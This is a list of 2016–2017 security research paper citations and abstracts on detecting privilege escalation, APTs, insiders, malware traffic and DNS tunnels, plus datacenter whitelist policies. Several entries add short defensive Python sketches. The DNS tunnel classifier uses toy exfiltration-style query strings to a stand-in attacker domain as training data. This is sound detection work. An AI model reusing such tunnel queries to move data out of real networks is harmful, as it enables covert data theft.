Zhu, Jun, Chu, Bill, Lipford, Heather.  2016.  Detecting Privilege Escalation Attacks Through Instrumenting Web Application Source Code. Proceedings of the 21st ACM on Symposium on Access Control Models and Technologies. :73–80.

Privilege Escalation is a common and serious type of security attack. Although experience shows that many applications are vulnerable to such attacks, attackers rarely succeed upon first trial. Their initial probing attempts often fail before a successful breach of access control is achieved. This paper presents an approach to automatically instrument application source code to report events of failed access attempts that may indicate privilege escalation attacks to a run time application protection mechanism. The focus of this paper is primarily on the problem of instrumenting web application source code to detect access control attack events. We evaluated false positives and negatives of our approach using two open source web applications.
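The reporting idea can be sketched independently of any particular web framework: wrap access-control checks so that every denial is emitted as a security event that a runtime protection layer can correlate. The Python decorator below is a hypothetical illustration, not the paper's instrumentation.

```python
import functools
import logging

security_log = logging.getLogger("access_monitor")   # hypothetical runtime monitor hook
logging.basicConfig(level=logging.INFO)

def report_failed_access(check):
    """Wrap an access-control check and report every denial as a security event."""
    @functools.wraps(check)
    def wrapper(user, resource, *args, **kwargs):
        allowed = check(user, resource, *args, **kwargs)
        if not allowed:
            # Repeated events like this may indicate privilege-escalation probing.
            security_log.warning("ACCESS_DENIED user=%s resource=%s", user, resource)
        return allowed
    return wrapper

@report_failed_access
def can_edit(user, resource):
    return user in resource.get("editors", set())

doc = {"editors": {"alice"}}
can_edit("mallory", doc)   # emits an ACCESS_DENIED event
can_edit("alice", doc)     # silent
```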

Siddiqui, Sana, Khan, Muhammad Salman, Ferens, Ken, Kinsner, Witold.  2016.  Detecting Advanced Persistent Threats Using Fractal Dimension Based Machine Learning Classification. Proceedings of the 2016 ACM on International Workshop on Security And Privacy Analytics. :64–69.

Advanced Persistent Threats (APTs) are a new breed of internet-based smart threats, which can go undetected by existing state-of-the-art internet traffic monitoring and protection systems. With the evolution of the internet and cloud computing, a new generation of smart APT attacks has also evolved, and signature-based threat detection systems are proving to be futile and insufficient. One of the essential strategies in detecting APTs is to continuously monitor and analyze various features of a TCP/IP connection, such as the number of transferred packets, the total count of the bytes exchanged, the duration of the TCP/IP connections, and details of the number of packet flows. The current threat detection approaches make extensive use of machine learning algorithms that utilize statistical and behavioral knowledge of the traffic. However, the performance of these algorithms is far from satisfactory in terms of reducing false negatives and false positives simultaneously. Mostly, current algorithms focus on reducing false positives only. This paper presents a fractal-based anomaly classification mechanism, with the goal of reducing both false positives and false negatives simultaneously. A comparison of the proposed fractal-based method with a traditional Euclidean-based machine learning algorithm (k-NN) shows that the proposed method significantly outperforms the traditional approach by reducing false positive and false negative rates simultaneously, while improving the overall classification rates.

2017-09-01
Carmen Cheh, University of Illinois at Urbana-Champaign, Binbin Chen, Advanced Digital Sciences Center, Singapore, William G. Temple, Advanced Digital Sciences Center, Singapore, William H. Sanders, University of Illinois at Urbana-Champaign.  2017.  Data-Driven Model-Based Detection of Malicious Insiders via Physical Access Logs. 14th International Conference on Quantitative Evaluation of Systems (QEST 2017).

The risk posed by insider threats has usually been approached by analyzing the behavior of users solely in the cyber domain. In this paper, we show the viability of using physical movement logs, collected via a building access control system, together with an understanding of the layout of the building housing the system’s assets, to detect malicious insider behavior that manifests itself in the physical domain. In particular, we propose a systematic framework that uses contextual knowledge about the system and its users, learned from historical data gathered from a building access control system, to select suitable models for representing movement behavior. We then explore the online usage of the learned models, together with knowledge about the layout of the building being monitored, to detect malicious insider behavior. Finally, we show the effectiveness of the developed framework using real-life data traces of user movement in railway transit stations.

2017-08-22
Garcia, Sebastian, Pechoucek, Michal.  2016.  Detecting the Behavioral Relationships of Malware Connections. Proceedings of the 1st International Workshop on AI for Privacy and Security. :8:1–8:5.

A normal computer infected with malware is difficult to detect. There have been several approaches in recent years that analyze the behavior of malware and obtain good results. The malware traffic may be detected, but it is very common to misdetect normal traffic as malicious and generate false positives. This is especially the case when the methods are tested in real and large networks. The detection errors are generated due to the malware changing and rapidly adapting its domains and patterns to mimic normal connections. To better detect malware infections and separate them from normal traffic, we propose to detect the behavior of the group of connections generated by the malware. It is known that malware usually generates various related connections simultaneously and therefore shows a group pattern. Based on previous experiments, this paper suggests that the behavior of a group of connections can be modelled as a directed cyclic graph with special properties, such as its internal patterns, relationships, frequencies and sequences of connections. By training the group models on known traffic it may be possible to better distinguish between a malware connection and a normal connection.

Buczak, Anna L., Hanke, Paul A., Cancro, George J., Toma, Michael K., Watkins, Lanier A., Chavis, Jeffrey S..  2016.  Detection of Tunnels in PCAP Data by Random Forests. Proceedings of the 11th Annual Cyber and Information Security Research Conference. :16:1–16:4.

This paper describes an approach for detecting the presence of domain name system (DNS) tunnels in network traffic. DNS tunneling is a common technique hackers use to establish command and control nodes and to exfiltrate data from networks. To generate the training data sufficient to build models to detect DNS tunneling activity, a penetration testing effort was employed. We extracted features from this data and trained random forest classifiers to distinguish normal DNS activity from tunneling activity. The classifiers successfully detected the presence of tunnels we trained on, and four other types of tunnels that were not a part of the training set.
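A sketch of the general approach is shown below: derive per-query features such as name length, label count, and subdomain entropy, and train a scikit-learn random forest on labeled examples. The features and the tiny toy dataset are assumptions; the paper extracts its features from PCAP flow data gathered during penetration testing.

```python
import math
from collections import Counter
from sklearn.ensemble import RandomForestClassifier

def entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def features(qname: str):
    sub = qname.rsplit(".", 2)[0]            # strip the registered domain (rough)
    return [len(qname), qname.count("."), entropy(sub)]

normal = ["www.example.com", "mail.google.com", "cdn.jsdelivr.net"]
tunnel = ["dGhpcyBpcyBleGZpbA.t.evil.example", "aabbccddeeff00112233.t.evil.example"]

X = [features(q) for q in normal + tunnel]
y = [0] * len(normal) + [1] * len(tunnel)

clf = RandomForestClassifier(n_estimators=50, random_state=0).fit(X, y)
print(clf.predict([features("9f8e7d6c5b4a.t.evil.example"),
                   features("static.wikimedia.org")]))
```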

Jeyakumar, Vimalkumar, Madani, Omid, ParandehGheibi, Ali, Yadav, Navindra.  2016.  Data Driven Data Center Network Security. Proceedings of the 2016 ACM on International Workshop on Security And Privacy Analytics. :48–48.

Large-scale datacenters are becoming the compute and data platform of large enterprises, but their scale makes it difficult to secure the applications running within them. We motivate this setting using a real-world complex scenario, and propose a data-driven approach to taming this complexity. We discuss several machine learning problems that arise, in particular focusing on inducing so-called whitelist communication policies from observing masses of communications among networked computing nodes. Briefly, a whitelist policy specifies which machine, or group of machines, can talk to which. We present some of the challenges and opportunities, such as noisy and incomplete data, non-stationarity, lack of supervision, and challenges of evaluation, and describe some of the approaches we have found promising.
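A toy version of whitelist induction is sketched below: given observed flows and a grouping of machines, permit exactly the group-to-group, port-level edges that were observed. Learning the groups is the hard part the paper discusses; here the group labels are simply given, which is the main simplification.

```python
from collections import defaultdict

# Observed flows: (source host, destination host, destination port).
flows = [
    ("web-1", "db-1", 5432), ("web-2", "db-1", 5432),
    ("web-1", "cache-1", 6379), ("ops-1", "web-1", 22),
]

# Group membership would normally be learned (e.g. by clustering traffic
# profiles); here it is given, which is the main simplification.
group_of = {"web-1": "web", "web-2": "web", "db-1": "db",
            "cache-1": "cache", "ops-1": "ops"}

def induce_whitelist(flows, group_of):
    policy = defaultdict(set)
    for src, dst, port in flows:
        policy[(group_of[src], group_of[dst])].add(port)
    return dict(policy)

policy = induce_whitelist(flows, group_of)
print(policy)

def allowed(src, dst, port, policy, group_of):
    return port in policy.get((group_of[src], group_of[dst]), set())

print(allowed("ops-1", "db-1", 5432, policy, group_of))  # False: never observed
```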